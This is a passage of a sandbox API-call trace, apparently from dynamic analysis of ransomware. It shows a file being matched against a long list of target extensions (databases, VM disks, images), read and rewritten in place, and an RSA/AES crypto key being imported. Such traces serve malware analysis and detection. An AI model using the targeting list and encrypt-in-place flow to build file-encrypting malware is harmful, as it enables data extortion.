Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fp3") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fp4") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fp5") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fp7") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fpt") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".frm") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".gdb") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".grdb") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".gwi") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".hdb") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".his") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ib") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".idb") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ihx") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".itdb") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".itw") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".jet") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".jtx") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".kdb") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".kexi") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".kexic") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".kexis") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".lgc") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".lwx") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".maf") returned 0x0 [0159.595] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".maq") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".mar") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".mas") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".mav") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".mdb") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".mdf") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".mpd") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".mrg") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".mud") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".mwb") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".myd") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ndf") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".nnt") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".nrmlib") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ns2") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ns3") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ns4") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".nsf") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".nv") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".nv2") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".nwdb") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".nyf") returned 0x0 [0159.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".odb") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".oqy") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".orx") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".owc") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".p96") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".p97") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".pan") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".pdb") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".pdm") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".pnz") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".qry") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".qvd") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".rbf") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".rctd") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".rod") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".rodx") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".rpd") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".rsd") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".sas7bdat") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".sbf") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".scx") returned 0x0 [0159.597] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".sdb") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".sdc") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".sdf") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".sis") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".spq") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".sql") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".sqlite") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".sqlite3") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".sqlitedb") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".te") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".temx") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".tmd") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".tps") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".trc") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".trm") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".udb") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".udl") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".usr") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".v12") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vis") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vpd") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vvv") returned 0x0 [0159.598] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".wdb") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".wmdb") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".wrk") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".xdb") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".xld") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".xmlff") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".abcddb") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".abs") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".abx") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".accdw") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".adn") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".db2") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fm5") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".hjt") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".icg") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".icr") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".kdb") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".lut") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".maw") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".mdn") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".mdt") returned 0x0 [0159.599] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vdi") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vhd") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vmdk") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".pvm") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vmem") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vmsn") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vmsd") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".nvram") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vmx") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".raw") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".qcow2") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".subvol") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".bin") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vsv") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".avhd") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vmrs") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vhdx") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".avdx") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".vmcx") returned 0x0 [0159.600] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".iso") returned 0x0 [0159.600] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.601] WriteFile (in: hFile=0x714, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0159.604] WriteFile (in: hFile=0x714, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0159.604] SetEndOfFile (hFile=0x714) returned 1 [0159.604] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.605] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x4d8cda, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc80*=0x4d8cda, lpOverlapped=0x0) returned 1 [0160.754] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffb27326, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.755] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x4d8cda, lpNumberOfBytesWritten=0x383fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc2c*=0x4d8cda, lpOverlapped=0x0) returned 1 [0161.025] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x4d8cda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.025] ReadFile (hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x4d8cda, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0) Thread: id = 4 os_tid = 0xba8 [0055.532] VirtualAlloc (lpAddress=0x0, dwSize=0x500040, flAllocationType=0x3000, flProtect=0x4) returned 0x4b20000 [0055.533] CryptAcquireContextA (in: phProv=0x397fcf4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x397fcf4*=0xecf568) returned 1 [0055.534] CryptImportKey (in: hProv=0xecf568, pbData=0x2826098, dwDataLen=0x1000, hPubKey=0x0, dwFlags=0x0, phKey=0x397ff80 | out: phKey=0x397ff80*=0xecf820) returned 1 [0055.534] Sleep (dwMilliseconds=0x1f4) [0060.625] Sleep (dwMilliseconds=0x1f4) [0069.842] Sleep (dwMilliseconds=0x1f4) [0070.518] Sleep (dwMilliseconds=0x1f4) [0071.043] Sleep (dwMilliseconds=0x1f4) [0071.558] Sleep (dwMilliseconds=0x1f4) [0072.073] Sleep (dwMilliseconds=0x1f4) [0072.724] Sleep (dwMilliseconds=0x1f4) [0076.826] Sleep (dwMilliseconds=0x1f4) [0077.330] Sleep (dwMilliseconds=0x1f4) [0077.844] Sleep (dwMilliseconds=0x1f4) [0078.360] Sleep (dwMilliseconds=0x1f4) [0078.874] Sleep (dwMilliseconds=0x1f4) [0079.389] Sleep (dwMilliseconds=0x1f4) [0079.904] Sleep (dwMilliseconds=0x1f4) [0080.418] Sleep (dwMilliseconds=0x1f4) [0080.933] Sleep (dwMilliseconds=0x1f4) [0081.448] Sleep (dwMilliseconds=0x1f4) [0081.963] Sleep (dwMilliseconds=0x1f4) [0082.478] Sleep (dwMilliseconds=0x1f4) [0083.190] Sleep (dwMilliseconds=0x1f4) [0084.108] Sleep (dwMilliseconds=0x1f4) [0084.654] Sleep (dwMilliseconds=0x1f4) [0085.161] Sleep (dwMilliseconds=0x1f4) [0085.676] Sleep (dwMilliseconds=0x1f4) [0086.254] Sleep (dwMilliseconds=0x1f4) [0086.767] Sleep (dwMilliseconds=0x1f4) [0087.282] Sleep (dwMilliseconds=0x1f4) [0087.797] Sleep (dwMilliseconds=0x1f4) [0088.598] Sleep (dwMilliseconds=0x1f4) [0089.500] Sleep (dwMilliseconds=0x1f4) [0090.048] Sleep (dwMilliseconds=0x1f4) [0090.561] Sleep (dwMilliseconds=0x1f4) [0091.233] Sleep (dwMilliseconds=0x1f4) [0091.754] Sleep (dwMilliseconds=0x1f4) [0092.526] Sleep (dwMilliseconds=0x1f4) [0093.111] Sleep (dwMilliseconds=0x1f4) [0093.644] Sleep (dwMilliseconds=0x1f4) [0094.202] Sleep (dwMilliseconds=0x1f4) [0094.737] Sleep (dwMilliseconds=0x1f4) [0095.238] Sleep (dwMilliseconds=0x1f4) [0095.754] Sleep (dwMilliseconds=0x1f4) [0096.268] Sleep (dwMilliseconds=0x1f4) [0096.799] Sleep (dwMilliseconds=0x1f4) [0097.313] Sleep (dwMilliseconds=0x1f4) [0097.835] Sleep (dwMilliseconds=0x1f4) [0098.359] Sleep (dwMilliseconds=0x1f4) [0098.874] Sleep (dwMilliseconds=0x1f4) [0099.879] Sleep (dwMilliseconds=0x1f4) [0100.423] Sleep (dwMilliseconds=0x1f4) [0100.944] Sleep (dwMilliseconds=0x1f4) [0101.460] Sleep (dwMilliseconds=0x1f4) [0101.995] Sleep (dwMilliseconds=0x1f4) [0102.725] Sleep (dwMilliseconds=0x1f4) [0103.335] Sleep (dwMilliseconds=0x1f4) [0103.870] Sleep (dwMilliseconds=0x1f4) [0104.388] Sleep (dwMilliseconds=0x1f4) [0105.011] Sleep (dwMilliseconds=0x1f4) [0105.559] Sleep (dwMilliseconds=0x1f4) [0106.585] Sleep (dwMilliseconds=0x1f4) [0107.110] Sleep (dwMilliseconds=0x1f4) [0107.735] Sleep (dwMilliseconds=0x1f4) [0108.360] Sleep (dwMilliseconds=0x1f4) [0108.900] Sleep (dwMilliseconds=0x1f4) [0109.403] Sleep (dwMilliseconds=0x1f4) [0110.104] Sleep (dwMilliseconds=0x1f4) [0110.604] Sleep (dwMilliseconds=0x1f4) [0111.337] Sleep (dwMilliseconds=0x1f4) [0111.859] Sleep (dwMilliseconds=0x1f4) [0112.591] Sleep (dwMilliseconds=0x1f4) [0113.127] Sleep (dwMilliseconds=0x1f4) [0113.652] Sleep (dwMilliseconds=0x1f4) [0114.283] Sleep (dwMilliseconds=0x1f4) [0114.798] Sleep (dwMilliseconds=0x1f4) [0115.736] Sleep (dwMilliseconds=0x1f4) [0116.240] Sleep (dwMilliseconds=0x1f4) [0116.878] Sleep 